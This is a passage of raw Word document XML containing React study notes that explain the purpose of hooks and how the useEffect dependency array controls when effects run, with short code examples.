    <w:p w14:paraId="77DCCAE7"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st [isPending, startTransition] = useTransition();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C60F82D" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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2. useDeferredValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1DC4B7"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d to defer the update of a value until the browser has more idle time, which helps to keep the app responsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14108FC1"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st deferredValue = useDeferredValue(value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A678879" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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3. useSyncExternalStore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EB6DFC"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A hook to subscribe to external stores (like a state management library or a global store) and get the latest snapshot of the store’s state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E74931"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st state = useSyncExternalStore(subscribe, getSnapshot);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEFC52D" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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hese hooks allow you to manage state, side effects, context, refs, performance optimizations, and more in functional components, making React a powerful library for building user interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A1E89" w14:textId="12842CBC" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="5E698E47">
          <v:rect id="_x0000_i3573" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4771D" w14:textId="307EB8F5" w:rsidR="002B263A" w:rsidRPr="00CE4B95" w:rsidRDefault="00811A55">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="878" w:name="_Toc196308358"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the purpose of Hook</w:t>
      </w:r>
      <w:r w:rsidR="002B263A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="878"/>
    </w:p>
    <w:p w14:paraId="0142E163" w14:textId="7C1C24AB" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The purpose of hooks in React is to enable the use of state and lifecycle features in </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional components</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which previously were only available in </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class components</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Hooks allow you to write cleaner, more reusable, and easier-to-understand code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD4563"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Here’s a breakdown of the key purposes of hooks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBF089" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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1. State Management in Functional Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647789AA"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Before hooks, only class components could have state. With the introduction of useState, you can now add state to functional components, making it easier to manage dynamic data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E92D0D"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st [count, setCount] = useState(0);  // Adds state to a functional component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047233F4" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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2. Side Effects Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FBE28"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The useEffect hook lets you perform side effects like data fetching, subscriptions, or DOM manipulations in functional components. It provides a way to run code after render and control when the effect should run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246EC5F2"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Effect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC9E58"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 Code to run on mount and update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143701C"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dependencyArray]);  // Runs on dependency change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3330A95B" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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3. Reusability of Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDDD0F6"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Hooks encourage </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reusable logic</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. You can extract logic into custom hooks, allowing you to share logic between components without changing the component structure or behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A66375"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function useCustomHook() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E423D2B"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 Custom logic here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E318744"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return someValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1F2414"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7EE15" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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4. Cleaner and More Concise Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113554CD"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ith hooks, functional components can handle complex logic without the need for a class-based component structure, making your codebase cleaner and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460306A7" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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5. Direct Access to React Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2307C3"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Hooks provide a direct API for handling different features such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EDAE8A"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lastRenderedPageBreak/>
        <w:t>useState: State management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104DB0CA"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Effect: Side effects (like data fetching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83E1E5"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Context: Accessing context values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DBD9F"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Reducer: More complex state logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE055C6"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Ref: Accessing DOM elements or keeping mutable values across renders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C47850A" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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6. Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7B0FE"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Hooks like useMemo and useCallback allow you to optimize performance by memoizing expensive calculations and callbacks so they aren't unnecessarily recalculated or re-rendered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDDCA60" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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7. Simplified Lifecycle Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A9B75D"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Before hooks, you had to use different lifecycle methods (like componentDidMount, componentDidUpdate, and componentWillUnmount) in class components to manage side effects and component life cycles. With hooks, useEffect combines all these into a single function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC599B" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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8. Better Composition of Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B365BA9"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With hooks, you can break down logic into smaller functions, making it easier to compose and manage components, improving code organization and testability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F673FC2" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="00000000" w:rsidP="003C7C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4F39FB6">
          <v:rect id="_x0000_i3574" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2705B564"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In summary, the primary purpose of hooks in React is to </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enhance functional components</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by enabling features like state management, side effects, context, and optimizations, while making the code simpler and more reusable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7480BA" w14:textId="67406FBF" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="7C266011">
          <v:rect id="_x0000_i3575" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7623D4F5" w14:textId="0602050B" w:rsidR="002B263A" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA1B73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="879" w:name="_Toc196308359"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the dependency array in useEffect</w:t>
      </w:r>
      <w:r w:rsidR="002B263A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="879"/>
    </w:p>
    <w:p w14:paraId="771C0E4E" w14:textId="45B66781" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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The </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in useEffect is an optional second argument that determines when the effect should run. It is an array of values (usually props or state) that </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the effect depends on</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If any value in the dependency array changes between renders, the effect will re-run. If the array is empty ([]), the effect will only run once — when the component is mounted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5DBB01" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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Explanation of Dependency Array in useEffect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DBC1CC"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Empty Array ([])</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">When you pass an empty array as the second argument to useEffect, the effect will run </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only once</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, after the initial render. This is similar to the behavior of componentDidMount in class components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A67DEF"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Effect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A16F5"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console.log("This runs only once, after the initial render");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8FACBD"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  // Empty dependency array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E2B28A"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With Dependencies ([dep1, dep2, ...])</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">If you pass an array with dependencies, the effect will run after the initial render </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and whenever any of the values in the array change</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE836D8"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st [count, setCount] = useState(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568CC6B9" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B08145"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Effect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C1AA5"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console.log(`Count changed to: ${count}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3776F90B"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count]);  // Runs whenever 'count' changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3CF150"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n the above example, the effect will run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F026D7E" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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After the initial render.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F5609" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Every time the value of count changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42047A40"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No Dependency Array</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">If you omit the dependency array altogether, the effect will run </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after every render</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the component, just like componentDidUpdate in class components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D2C111"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Effect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70457E84"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console.log("This runs after every render");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351389E3"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 No dependency array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D8DB9" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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Best Practices for Using the Dependency Array:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C52DE41"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Always include all variables used inside useEffect that are </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>outside</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of it (like props, state, or functions) in the dependency array to avoid potential bugs due to stale closures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52253A9B"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f you want the effect to run once on mount and not re-run again, use an empty array ([]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794621B9"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f you need the effect to run based on certain state or props, list those variables inside the dependency array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288B91C" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D"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Example with Multiple Dependencies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2232273D"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f your effect depends on more than one variable, you can list all of them in the dependency array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79180E3F"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lastRenderedPageBreak/>
        <w:t>const [count, setCount] = useState(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE784D8"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nst [name, setName] = useState("Alice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE012FC" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45451015"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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0586DADC"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xml:space="preserve">  console.log(`Count: ${count}, Name: ${name}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2186EC9C"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 [count, name]);  // Runs whenever 'count' or 'name' changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FE979"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In the example above, the effect will re-run whenever either count or name changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CA7C3" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5CD7C1"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Empty dependency array []</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs the effect only once (on mount).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CDE0E0"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Dependencies [dep1, dep2, ...]</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs the effect whenever any of the dependencies change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38E271"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No array</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs the effect after every render.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53E6A2" w14:textId="77777777" w:rsidR="002E0B3D" w:rsidRPr="003C7C02" w:rsidRDefault="002E0B3D" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
